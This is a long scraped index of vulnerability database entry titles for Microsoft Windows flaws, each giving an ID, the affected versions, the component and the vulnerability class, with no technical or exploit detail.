Microsoft Windows up to Server 2019 GDI information disclosure [137559] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137555] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137554] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137553] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137549] Microsoft Windows up to Server 2016 DLL privilege escalation [137544] Microsoft Windows up to Server 2019 Kernel information disclosure [137541] Microsoft Windows up to Server 2019 privilege escalation [137540] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [137539] Microsoft Windows up to Server 2016 DirectX privilege escalation [137538] Microsoft Windows Server 1803/Server 1903/Server 2016/Server 2019 ADFS Security Feature 7PK Security Features [137537] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [137535] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [137533] Microsoft Windows up to Server 2019 SymCrypt privilege escalation [137532] Microsoft Windows DNS Server Data Processing Error [137527] Microsoft Windows up to Server 2019 GDI+ memory corruption [137512] Microsoft Windows up to Server 2019 DHCP memory corruption [136349] Microsoft Windows up to Server 2019 Event Viewer eventvwr.msc information disclosure [136348] Microsoft Windows up to Server 2019 Task Scheduler privilege escalation [136347] Microsoft Windows up to Server 2019 AppXSVC privilege escalation [136345] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [136344] Microsoft Windows up to Server 2019 GDI information disclosure [136343] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136341] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136340] Microsoft Windows up to Server 2019 GDI information disclosure [136337] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [136336] Microsoft Windows up to Server 2019 Kernel privilege escalation [136335] Microsoft Windows up to Server 2019 NTLM 7PK Security Features [136334] Microsoft Windows up to Server 2019 Kernel information disclosure [136326] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136325] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136324] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136323] Microsoft Windows up to Server 2019 memory corruption [136321] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Audio Service privilege escalation [136320] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136319] Microsoft Windows up to Server 2019 Security Credentials 7PK Security Features [136318] Microsoft Windows up to Server 2019 DirectX privilege escalation [136317] Microsoft Windows up to Server 2019 Win32k privilege escalation [136316] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136315] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136314] Microsoft Windows up to Server 2019 Win32k privilege escalation [136313] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136312] Microsoft Windows up to Server 2019 GDI information disclosure [136311] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136310] Microsoft Windows up to Server 2019 GDI information disclosure [136309] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136308] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136306] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136305] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [136304] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136303] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136302] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136301] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136299] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service 7PK Security Features [136298] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136297] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [136296] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136295] Microsoft Windows up to Server 2019 ALPC privilege escalation [136293] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136292] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136291] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136290] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136289] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136288] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136287] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136286] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136285] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136284] Microsoft Windows up to Server 2019 Kernel privilege escalation [136277] Microsoft Windows 7 SP1/2008 R2 SP1 Speech API memory corruption [136276] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136275] Microsoft Windows 10/10 1607/10 1703/10 1709/Server 2016 Hyper-V privilege escalation [136274] Microsoft Windows up to Server 2019 ActiveX memory corruption [136273] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [134744] Microsoft Windows up to Server 2019 GDI information disclosure [134733] Microsoft Windows up to Server 2019 Unified Write Filter privilege escalation [134731] Microsoft Windows up to Server 2019 Symlink privilege escalation [134729] Microsoft Windows up to Server 2019 Storage Service privilege escalation [134725] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134724] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134723] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134722] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134721] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134720] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134719] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134718] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134717] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134716] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134715] Microsoft Windows up to Server 2019 Win32k privilege escalation [134714] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134713] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134712] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134710] Microsoft Windows up to Server 2019 GDI information disclosure [134709] Microsoft Windows up to Server 2019 Kernel privilege escalation [134706] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [134701] Microsoft Windows up to Server 2019 Windows Defender Application Control 7PK Security Features [134700] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [134699] Microsoft Windows up to Server 2019 NDIS ndis.sys privilege escalation [134698] Microsoft Windows up to Server 2019 OLE privilege escalation [134684] Microsoft Windows up to Server 2019 DHCP Server memory corruption [134678] Microsoft Windows up to Server 2019 GDI+ memory corruption [133378] Microsoft Windows 7/8/10/Vista Contact File cross site scripting [133237] Microsoft Windows Admin Center privilege escalation [133236] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133234] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133222] Microsoft Windows up to Server 2019 Remote Registry Service memory corruption [133221] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133220] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133219] Microsoft Windows up to Server 2019 Win32k Memory information disclosure [133218] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133217] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133216] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133215] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [133214] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [133213] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133212] Microsoft Windows up to Server 2019 Terminal Services Memory information disclosure [133211] Microsoft Windows up to Server 2019 Task Scheduler information disclosure [133210] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 DirectX information disclosure [133209] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133196] Microsoft Windows up to Server 2019 Win32k information disclosure [133195] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133194] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133193] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133192] Microsoft Windows up to Server 2019 OLE Automation memory corruption [133189] Microsoft Windows up to Server 2019 CSRSS privilege escalation [133188] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133187] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133186] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [133185] Microsoft Windows up to Server 2019 Win32k privilege escalation [133183] Microsoft Windows up to Server 2019 Win32k privilege escalation [133182] Microsoft Windows up to Server 2019 Win32k privilege escalation [133180] Microsoft Windows up to Server 2019 MS XML XML External Entity [133179] Microsoft Windows up to Server 2019 MS XML XML External Entity [133177] Microsoft Windows up to Server 2019 Device Guard luafv.sys 7PK Security Features [133174] Microsoft Windows up to Server 2019 GDI+ memory corruption [133173] Microsoft Windows up to Server 2019 IOleCvt Interface privilege escalation [133166] Microsoft Windows up to Server 2019 MS XML XML External Entity [133165] Microsoft Windows up to Server 2019 MS XML XML External Entity [133164] Microsoft Windows up to Server 2019 MS XML XML External Entity [133163] Microsoft Windows up to Server 2019 MS XML XML External Entity [133162] Microsoft Windows up to Server 2019 MS XML XML External Entity [131685] Microsoft Windows up to Server 2019 SMB information disclosure [131683] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [131681] Microsoft Windows up to Server 2019 Win32k privilege escalation [131679] Microsoft Windows up to Server 2019 Kernel information disclosure [131674] Microsoft Windows up to Server 2019 Win32k information disclosure [131673] Microsoft Windows up to Server 2019 Kernel information disclosure [131672] Microsoft Windows up to Server 2019 GDI information disclosure [131671] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [131668] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [131667] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [131663] Microsoft Windows up to Server 2019 Print Spooler information disclosure [131658] Microsoft Windows up to Server 2019 information disclosure [131657] Microsoft Windows up to Server 2019 memory corruption [131653] Microsoft Windows up to Server 2019 SMB information disclosure [131652] Microsoft Windows up to Server 2019 SMB information disclosure [131651] Microsoft Windows up to Server 2019 Kernel information disclosure [131650] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [131649] Microsoft Windows up to Server 2019 Kernel privilege escalation [131648] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131644] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131642] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Active Directory privilege escalation [131638] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [131632] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131631] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131630] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131629] Microsoft Windows up to Server 2019 Deployment Services TFTP Server privilege escalation [131628] Microsoft Windows up to Server 2019 ActiveX memory corruption [131619] Microsoft Windows up to Server 2019 MS XML XML External Entity [131616] Microsoft Windows REG File Message weak authentication [131328] Microsoft Windows up to Server 2016 Kernel information disclosure [130820] Microsoft Windows up to Server 2012 R2 GDI information disclosure [130819] Microsoft Windows Kernel information disclosure [130818] Microsoft Windows up to Server 2019 GDI information disclosure [130817] Microsoft Windows up to Server 2019 Storage Service privilege escalation [130814] Microsoft Windows up to Server 2019 privilege escalation [130809] Microsoft Windows up to Server 2019 Defender Firewall Security 7PK Security Features [130808] Microsoft Windows up to Server 2019 information disclosure [130807] Microsoft Windows up to Server 2019 Hyper-V information disclosure [130806] Microsoft Windows up to Server 2019 SMB Data Processing Error [130805] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130804] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130803] Microsoft Windows up to Server 2019 SMB Data Processing Error [130802] Microsoft Windows up to Server 2019 Win32k information disclosure [130801] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130800] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130799] Microsoft Windows up to Server 2016 Win32k privilege escalation [130798] Microsoft Windows up to Server 2019 GDI information disclosure [130797] Microsoft Windows up to Server 2019 GDI information disclosure [130796] Microsoft Windows up to Server 2019 GDI information disclosure [130793] Microsoft Windows up to Server 2019 GDI information disclosure [130792] Microsoft Windows up to Server 2019 HID information disclosure [130791] Microsoft Windows up to Server 2019 HID information disclosure [130790] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130789] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130788] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130787] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130786] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130784] Microsoft Windows up to Server 2019 GDI+ memory corruption [130782] Microsoft Windows up to Server 2019 DHCP Server memory corruption [130781] Microsoft Windows up to Server 2019 GDI+ memory corruption [129167] Microsoft Windows VCF File memory corruption [128761] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128760] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128759] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128758] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128757] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128756] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128755] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128754] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128753] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128752] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128751] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128750] Microsoft Windows up to Server 2019 Runtime privilege escalation [128749] Microsoft Windows up to Server 2019 Kernel information disclosure [128739] Microsoft Windows up to Server 2019 Kernel information disclosure [128738] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [128737] Microsoft Windows up to Server 2019 COM Desktop Broker privilege escalation [128736] Microsoft Windows up to Server 2019 Kernel information disclosure [128733] Microsoft Windows up to Server 2019 Authentication Request privilege escalation [128730] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128728] Microsoft Windows up to Server 2019 Kernel information disclosure [128727] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128726] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128725] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128722] Microsoft Windows 10 1803/Server 1803 DHCP Client memory corruption [128718] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [128717] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [127881] Microsoft Windows 10 1809/Server 2019 memory corruption [127880] Microsoft Windows up to Server 2019 Win32k privilege escalation [127828] Microsoft Windows up to Server 2019 Win32k privilege escalation [127827] Microsoft Windows 10 1809/Server 2019 DirectX information disclosure [127826] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Win32k information disclosure [127823] Microsoft Windows up to Server 2012 R2 Kernel information disclosure [127822] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 Kernel information disclosure [127821] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [127820] Microsoft Windows up to Server 2019 Kernel privilege escalation [127816] Microsoft Windows up to Server 2019 GDI information disclosure [127815] Microsoft Windows up to Server 2019 GDI information disclosure [127812] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [127803] Microsoft Windows up to Server 2019 Text-To-Speech memory corruption [127801] Microsoft Windows up to Server 2019 DNS Server memory corruption [126750] Microsoft Windows up to Server 2019 ALPC privilege escalation [126739] Microsoft Windows up to Server 2012 R2 Win32k information disclosure [126737] Microsoft Windows up to Server 2012 R2 DirectX information disclosure [126736] Microsoft Windows up to Server 2019 Win32k privilege escalation [126735] Microsoft Windows up to Server 2019 DirectX privilege escalation [126733] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DirectX privilege escalation [126730] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [126725] Microsoft Windows up to Server 2019 DirectX privilege escalation [126722] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126718] Microsoft Windows up to Server 2016 Search privilege escalation [126714] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126713] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [126712] Microsoft Windows up to Server 2016 Graphics Component memory corruption [126711] Microsoft Windows up to Server 2019 Deployment Services TFTP Server memory corruption [125123] Microsoft Windows up to Server 2019 Codecs Library information disclosure [125121] Microsoft Windows up to Server 2019 DirectX information disclosure [125120] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125119] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125115] Microsoft Windows up to Server 2019 Theme API privilege escalation [125114] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [125113] Microsoft Windows up to Server 2019 Kernel privilege escalation [125112] Microsoft Windows 10 1803/Server 1803 Subsystem for Linux privilege escalation [125111] Microsoft Windows up to Server 2019 Device Guard Code Integrity Policy 7PK Security Features [125110] Microsoft Windows up to Server 2019 DNS Global Blocklist 7PK Security Features [125109] Microsoft Windows up to Server 2019 NTFS privilege escalation [125108] Microsoft Windows up to Server 2019 Filter Manager privilege escalation [125103] Microsoft Windows Server 2008 SP2 Graphics Component information disclosure [125101] Microsoft Windows Graphics Component memory corruption [125098] Microsoft Windows up to Server 2019 JET Database Engine privilege escalation [125097] Microsoft Windows up to Server 2019 DirectX Graphics privilege escalation [125096] Microsoft Windows up to Server 2019 Win32k privilege escalation [125093] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125092] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125091] Microsoft Windows up to Server 2019 MS XML XML External Entity [124217] Microsoft Windows Server 2012/Server 2016 Active Directory Federation Services /adfs/ls privilege escalation [123881] Microsoft Windows up to Server 2016 Sandbox privilege escalation [123874] Microsoft Windows up to Server 2016 Kernel information disclosure [123872] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 SMB information disclosure [123868] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123867] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123866] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123864] Microsoft Windows up to Server 2016 Hyper-V information disclosure [123853] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel Memory information disclosure [123851] Microsoft Windows up to Server 2016 ALPC privilege escalation [123849] Microsoft Windows up to Server 2016 SMB privilege escalation [123843] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123842] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123830] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123828] Microsoft Windows up to Server 2016 Win32k Graphics privilege escalation [123827] Microsoft Windows up to Server 2016 Image privilege escalation [123825] Microsoft Windows up to Server 2016 MSXML Parser XML External Entity [123823] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [122888] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Windows Shell privilege escalation [122886] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122885] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122884] Microsoft Windows up to Server 2016 Win32k privilege escalation [122883] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122861] Microsoft Windows up to Server 2016 Microsoft COM for Windows privilege escalation [122858] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 LNK privilege escalation [122849] Microsoft Windows up to Server 2016 Diagnostic Hub privilege escalation [122848] Microsoft Windows Security Feature 2FA 7PK Security Features [122834] Microsoft Windows up to Server 2016 LNK privilege escalation [122833] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI+ memory corruption [122826] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 PDF memory corruption [122825] Microsoft Windows up to Server 2016 Graphics privilege escalation [121116] Microsoft Windows up to Server 2016 Sandbox privilege escalation [121111] Microsoft Windows up to Server 2016 Kernel privilege escalation [121110] Microsoft Windows up to Server 2016 Wordpad 7PK Security Features [121107] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll Data Processing Error [121092] Microsoft Windows up to Server 2016 FTP Server Data Processing Error [119474] Microsoft Windows up to Server 2016 GDI information disclosure [119471] Microsoft Windows 10 1803/Server 1803 Win32k privilege escalation [119470] Microsoft Windows up to Server 2016 HTTP HTTP.sys Data Processing Error [119469] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel privilege escalation [119468] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119467] Microsoft Windows up to Server 2016 Hypervisor privilege escalation [119466] Microsoft Windows 10 1709/Server 1709 Hyper-V privilege escalation [119465] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119464] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119463] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119461] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119460] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119459] Microsoft Windows up to Server 2016 privilege escalation [119457] Microsoft Windows up to Server 2016 Desktop Bridge privilege escalation [119456] Microsoft Windows up to Server 2016 Kernel information disclosure [119455] Microsoft Windows up to Server 2016 memory corruption [119454] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119453] Microsoft Windows 10 1709/10 1803/Server 1709/Server 1803 WebDAV privilege escalation [119452] Microsoft Windows up to Server 2016 HIDParser privilege escalation [119450] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Kernel information disclosure [119448] Microsoft Windows up to Server 2016 Code Integrity Module privilege escalation [119447] Microsoft Windows up to Server 2016 NTFS privilege escalation [119441] Microsoft Windows up to Server 2016 Media Foundation memory corruption [119437] Microsoft Windows up to Server 2016 HTTP Protocol Stack Http.sys Data Processing Error [119436] Microsoft Windows up to Server 2016 privilege escalation [119431] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [117558] Microsoft Windows up to Server 2016 memory corruption [117480] Microsoft Windows up to Server 2016 COM Serialized privilege escalation [117444] Microsoft Windows up to Server 2016 Hyper-V vSMB privilege escalation [117443] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [117442] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [117331] Microsoft Windows Host Compute Host Compute Service Shim privilege escalation [116048] Microsoft Windows up to Server 2016 DirectX Graphics Kernel Subsystem privilege escalation [116047] Microsoft Windows up to Server 2016 OpenType Font Driver atmfd.dll privilege escalation [116045] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [116039] Microsoft Windows up to Server 2016 Remote Desktop Protocol Data Processing Error [116031] Microsoft Windows up to Server 2016 Kernel information disclosure [116030] Microsoft Windows up to Server 2016 SNMP Service Data Processing Error [116026] Microsoft Windows up to Server 2016 Kernel information disclosure [116024] Microsoft Windows up to Server 2016 HTTP.sys privilege escalation [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [116019] Microsoft Windows up to Server 2016 Kernel information disclosure [116008] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116007] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116006] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116005] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116004] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116003] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [115994] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [115804] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [114565] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Kernel information disclosure [114550] Microsoft Windows Kernel information disclosure [114548] Microsoft Windows up to Server 2016 CNG Security Feature cng.sys 7PK Security Features [114547] Microsoft Windows up to Server 2016 Kernel information disclosure [114546] Microsoft Windows up to Server 2016 Kernel information disclosure [114545] Microsoft Windows up to Server 2016 Kernel information disclosure [114544] Microsoft Windows up to Server 2016 Kernel information disclosure [114543] Microsoft Windows up to Server 2016 Kernel information disclosure [114542] Microsoft Windows up to Server 2016 Kernel information disclosure [114541] Microsoft Windows up to Server 2016 Kernel information disclosure [114540] Microsoft Windows up to Server 2016 Kernel information disclosure [114536] Microsoft Windows up to Server 2016 CredSSP weak authentication [114535] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [114534] Microsoft Windows 10/10 1511/10 1607/10 1703/10 1709 Scripting Host 7PK Security Features [114531] Microsoft Windows up to Server 2016 Windows Installer privilege escalation [114530] Microsoft Windows up to Server 2016 GDI privilege escalation [114529] Microsoft Windows up to Server 2016 GDI privilege escalation [114528] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI privilege escalation [114527] Microsoft Windows up to Server 2016 Kernel information disclosure [114526] Microsoft Windows up to Server 2016 Kernel information disclosure [114525] Microsoft Windows up to Server 2016 Kernel information disclosure [114522] Microsoft Windows 10 1607/10 1703/Server 2016 Desktop Bridge privilege escalation [114521] Microsoft Windows up to Server 2016 Video Control privilege escalation [114520] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge privilege escalation [114518] Microsoft Windows up to Server 2016 Remote Assistance XML External Entity [114517] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge VFS privilege escalation [114516] Microsoft Windows up to Server 2016 Windows Shell privilege escalation [113264] Microsoft Windows 8.1/RT 8.1/Server 2012 R2 SMBv2/SMBv3 denial of service [113262] Microsoft Windows 10/Server 1709 Storage Services privilege escalation [113261] Microsoft Windows 10/Server 1709 Security Feature 7PK Security Features [113260] Microsoft Windows up to Server 2016 Kernel privilege escalation [113259] Microsoft Windows 10/Server 1709/Server 2016 NTFS privilege escalation [113258] Microsoft Windows 10/Server 1709 Kernel information disclosure [113257] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113256] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113255] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113254] Microsoft Windows up to Server 2016 Kernel information disclosure [113253] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113252] Microsoft Windows up to Server 2016 Kernel privilege escalation [113251] Microsoft Windows 10/Server 1709 Kernel privilege escalation [113250] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113249] Microsoft Windows up to Server 2016 Kernel privilege escalation [113248] Microsoft Windows up to Server 2016 Kernel information disclosure [113247] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113246] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113245] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 EOT Font Engine information disclosure [113244] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113243] Microsoft Windows 10/Server 2016 MultiPoint Management privilege escalation [113242] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113241] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113240] Microsoft Windows 10/Server 1709/Server 2016 AppContainer privilege escalation [113238] Microsoft Windows 10 1709/Server 1709 Named Pipe File System privilege escalation [113230] Microsoft Windows up to Server 2016 Scripting Engine information disclosure [113229] Microsoft Windows up to Server 2016 StructuredQuery memory corruption [111358] Microsoft Windows up to Server 2016 IPsec memory corruption [111347] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Color Management Icm32.dll information disclosure [110547] Microsoft Windows up to Server 2016 its:/ Protocol information disclosure [110531] Microsoft Windows 10/Server 2016 Device Guard 7PK Security Features [110522] Microsoft Windows up to Server 2016 RRAS privilege escalation [110350] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [110318] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [109360] Microsoft Windows up to Server 2016 Windows Search Data Processing Error [107920] Microsoft Windows up to Vista SP2 Graphics information disclosure [107759] Microsoft Windows up to Server 2016 SMB privilege escalation [107757] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107756] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107753] Microsoft Windows 10/Server 2016 SMB Data Processing Error [107744] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [107740] Microsoft Windows up to Server 2016 Graphics privilege escalation [107739] Microsoft Windows up to Server 2016 Graphics privilege escalation [107738] Microsoft Windows up to Server 2016 Search information disclosure [107734] Microsoft Windows 10/Server 2016 SMB privilege escalation [107731] Microsoft Windows 7 SP1 Shell memory corruption [107730] Microsoft Windows up to Server 2016 Search Remote privilege escalation [107724] Microsoft Windows up to Server 2016 Text Services Framework privilege escalation [107723] Microsoft Windows up to Server 2016 SMB information disclosure [106523] Microsoft Windows up to Server 2016 PDF Library memory corruption [106516] Microsoft Windows up to Server 2016 PDF Library memory corruption [106498] Microsoft Windows up to Server 2016 Shell privilege escalation [106497] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Uniscribe memory corruption [106496] Microsoft Windows up to Server 2016 Uniscribe information disclosure [106495] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [106492] Microsoft Windows Server 2012/Server 2012 R2/Server 2016 DHCP Service memory 